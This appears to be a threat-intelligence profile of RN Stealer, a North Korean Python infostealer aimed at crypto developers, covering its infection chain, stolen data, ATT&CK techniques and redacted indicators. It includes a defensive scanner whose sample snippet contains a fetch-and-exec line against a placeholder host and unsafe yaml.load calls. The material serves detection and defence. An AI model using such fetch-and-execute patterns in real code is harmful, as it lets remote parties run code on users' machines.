Malware, used by 3 actors

RN Stealer

RN Stealer is a Python-based infostealer associated with the North Korean threat group Slow Pisces, also tracked as Jade Sleet, TraderTraitor, and PUKCHONG. It was observed in a campaign targeting cryptocurrency developers through fake recruiting and malicious coding challenges hosted on GitHub. In the Python infection chain, trojanized repositories used unsafe PyYAML deserialization to execute an in-memory payload sequence that deployed RN Loader and then RN Stealer; malicious content was delivered only to validated victims, while non-targets received benign responses.

RN Stealer was recovered as a payload delivered through RN Loader. It generates a random victim ID that is used as a cookie in communications with its command-and-control server, requests an XOR key from the server for encrypting exfiltrated data, and uses Base64-encoded tokens R0, R64, R128, and R256 to manage communications and exfiltration. The recovered sample was taken from a macOS system.

Its collection focus is sensitive developer and cloud-related data on macOS hosts: the login.keychain-db file, stored SSH keys, installed applications, home directory contents, and configuration files for AWS, Kubernetes, and Google Cloud. Reporting also describes RN Stealer, together with RN Loader, as part of TraderTraitor's malware arsenal used to harvest SSH keys, saved credentials, and cloud service configurations from compromised developer workstations. The activity is tied to financially motivated DPRK operations focused primarily on the cryptocurrency sector.
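The infection chain described above hinges on two code patterns that a defender can look for before a cloned "coding challenge" repository is ever run: a PyYAML `yaml.load()` call without a safe Loader, and an `exec()` whose argument is Base64-decoded at runtime (the step the Execution technique below quotes). The following static checker is an added example, not code from Unit 42 or from Mallory; it relies only on Python's standard `ast` module and on PyYAML's public `load(stream, Loader)` signature. The file names, URL and sample repository snippet it scans are constructed for the demonstration, and FullLoader is treated as "not safe" as a conservative policy choice of this check.

```python
"""Flag unsafe PyYAML deserialization and exec() of decoded payloads in Python source.

Added example for review of untrusted repositories; it never imports or runs the
scanned code, it only parses it with the standard-library `ast` module.
"""
import ast
from typing import Dict, List

# PyYAML loader classes that do not construct arbitrary Python objects.
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}
# Entry points whose `Loader` argument decides whether the call is safe.
YAML_LOAD_FUNCS = {"yaml.load", "yaml.load_all"}
# Entry points this check always treats as unsafe on untrusted input (conservative policy).
YAML_UNSAFE_FUNCS = {"yaml.unsafe_load", "yaml.unsafe_load_all", "yaml.full_load", "yaml.full_load_all"}
B64_DECODERS = {"b64decode", "standard_b64decode", "urlsafe_b64decode"}


def _dotted_name(node: ast.AST) -> str:
    """Return 'pkg.attr.attr' for a Name/Attribute chain, or '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _contains_b64decode(node: ast.AST) -> bool:
    """True if any call inside `node` is a base64 decoder."""
    return any(
        isinstance(sub, ast.Call) and _dotted_name(sub.func).rsplit(".", 1)[-1] in B64_DECODERS
        for sub in ast.walk(node)
    )


class _Finder(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: List[Dict] = []

    def _report(self, node: ast.AST, rule: str, detail: str) -> None:
        self.findings.append({"line": node.lineno, "rule": rule, "detail": detail})

    def visit_Call(self, node: ast.Call) -> None:
        name = _dotted_name(node.func)
        if name in YAML_LOAD_FUNCS:
            # Loader may be given as keyword or as the second positional argument.
            loader = next((kw.value for kw in node.keywords if kw.arg == "Loader"), None)
            if loader is None and len(node.args) > 1:
                loader = node.args[1]
            loader_name = _dotted_name(loader).rsplit(".", 1)[-1] if loader is not None else ""
            if loader_name not in SAFE_LOADERS:
                self._report(node, "unsafe-yaml-load",
                             f"{name}() with Loader={loader_name or '<missing>'}; use yaml.safe_load()")
        elif name in YAML_UNSAFE_FUNCS:
            self._report(node, "unsafe-yaml-load", f"{name}() on possibly untrusted input")
        elif name in {"exec", "eval"} and node.args and _contains_b64decode(node.args[0]):
            self._report(node, "exec-decoded-payload", f"{name}() of a base64-decoded value")
        self.generic_visit(node)


def scan_source(src: str, filename: str = "<string>") -> List[Dict]:
    """Parse `src` and return findings sorted by line number."""
    finder = _Finder()
    finder.visit(ast.parse(src, filename=filename))
    return sorted(finder.findings, key=lambda f: f["line"])


def scan_file(path: str) -> List[Dict]:
    with open(path, encoding="utf-8") as fh:
        return scan_source(fh.read(), filename=path)


# Constructed sample mimicking a trojanized "coding challenge" project (not a real sample).
SAMPLE = """
import yaml, base64, requests
raw = open("config.yaml").read()
cfg = yaml.load(raw)                               # no Loader: flagged
cfg_full = yaml.load(raw, Loader=yaml.FullLoader)  # non-safe loader: flagged
cfg_ok = yaml.load(raw, Loader=yaml.SafeLoader)    # fine
cfg_safe = yaml.safe_load(raw)                     # fine
body = requests.get("https://example.invalid/api").text
exec(base64.b64decode(body))                       # flagged
"""

if __name__ == "__main__":
    for finding in scan_source(SAMPLE, "sample_repo/setup.py"):
        print(f"line {finding['line']:>3}  {finding['rule']:<22} {finding['detail']}")
```

Run it over a cloned repository with `scan_file()` on each `.py` file before executing anything from the project; a hit on either rule is a reason to stop and inspect, which is exactly the step the Unit 42 write-up notes victims skipped.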


THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers.
Lazarus

However, we recovered a Python-based infostealer delivered by option 2, and we track this malware as RN Stealer. RN Stealer first generates a random victim ID, subsequently used as a cookie in all communications to the C2 server. It then requests an XOR key from the server for encrypting exfiltrated data.

via Palo Alto Networks Unit 42 blog (unit42.paloaltonetworks.com)
TraderTraitor

However, we recovered a Python-based infostealer delivered by option 2, and we track this malware as RN Stealer. RN Stealer first generates a random victim ID, subsequently used as a cookie in all communications to the C2 server. It then requests an XOR key from the server for encrypting exfiltrated data.

via Palo Alto Networks Unit 42 blog (unit42.paloaltonetworks.com)
Contagious Interview

Listed in the Wiz “TraderTraitor: Deep Dive” entry.

MITRE ATT&CK

Techniques & procedures

15 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

4 techniques
T1195 Supply Chain Compromise (Evidence: 1)

“...posing as potential employers and sending malware disguised as coding challenges... require developers to run a compromised project...” ; “...ran the script without inspecting its contents... hidden malware... credentials... stolen...”

T1199 Trusted Relationship (Evidence: 1)

Slow Pisces began by impersonating recruiters on LinkedIn and engaging with potential targets, sending them a benign PDF with a job description... attackers presented them with a coding challenge... which links to a GitHub repository.

T1566.002 Spearphishing Link (Evidence: 1)

The question sheets include generic software development tasks and a “real project” coding challenge, which links to a GitHub repository.

T1566.003 Spearphishing via Service (Evidence: 1)

Slow Pisces engaged with cryptocurrency developers on LinkedIn, posing as potential employers and sending malware disguised as coding challenges.

Execution

1 technique
T1059.006 Python (Evidence: 1)

The deserialization payload establishes a command loop with the C2 server... delivering a custom Python infostealer via option code 2... Base64-decodes sent content and executes it using the Python built-in exec.

Stealth

2 techniques
T1036 Masquerading (Evidence: 1)

The repositories contained code adapted from open-source projects... The malicious command-and-control (C2) server is configured to mimic the format of the legitimate sources... domains... frequently using subdomains like .api or .cdn.

T1620 Reflective Code Loading (Evidence: 1)

The following stages in Table 1 exist primarily in memory and generally have no footprint on disk... Delivery of payloads at each stage is heavily guarded, existing in memory only.

Credential Access

2 techniques
T1528 Steal Application Access Token (Evidence: 1)

RN Stealer... steal[s]... Configuration files for AWS, Kubernetes and Google Cloud.

T1649 Steal or Forge Authentication Certificates (Evidence: 1)

RN Stealer... steal[s] information specific to macOS devices, including... The login.keychain-db file that stores saved credentials in macOS systems.

Discovery

2 techniques
T1082 System Information Discovery (Evidence: 1)

It sends basic information about the victim machine and operating system... RN Stealer... steal[s] information specific to macOS devices, including: basic victim information (username, machine name and architecture); installed applications.

T1083 File and Directory Discovery (Evidence: 1)

RN Stealer... steal[s]... A directory listing and the top-level contents of the victim’s home directory.

Command and Control

3 techniques
T1001 Data Obfuscation (Evidence: 1)

Communication with the C2 server occurs over HTTPS, using Base64-encoded tokens to identify request and response types... It then requests an XOR key from the server for encrypting exfiltrated data.

T1071.001 Web Protocols (Evidence: 1)

It sends basic information about the victim machine and operating system over HTTPS to the same C2... Communication with the C2 server occurs over HTTPS, using Base64-encoded tokens to identify request and response types.

T1105 Ingress Tool Transfer (Evidence: 1)

Base64-decodes sent content and saves it to the file init.dll for Windows or init for all other operating systems... Loads and executes the downloaded DLL... Content is saved to the file dockerd... dockerd is then executed in a new process.

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (Evidence: 1)

RN Stealer first generates a random victim ID... It then requests an XOR key from the server for encrypting exfiltrated data... R64 – exfiltrating data, R128 – exfiltrating compressed data.

INDICATORS OF COMPROMISE

IOCs tracked for this family

4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.

Network
1 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
2 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
1 tracked

Other indicator types observed in public reporting.

Type          Value                       Latest sighting
hash.sha256   (redacted on public page)   1 year ago
hash.sha256   (redacted on public page)   1 year ago
domain        (redacted on public page)   1 year ago
uri           (redacted on public page)   1 year ago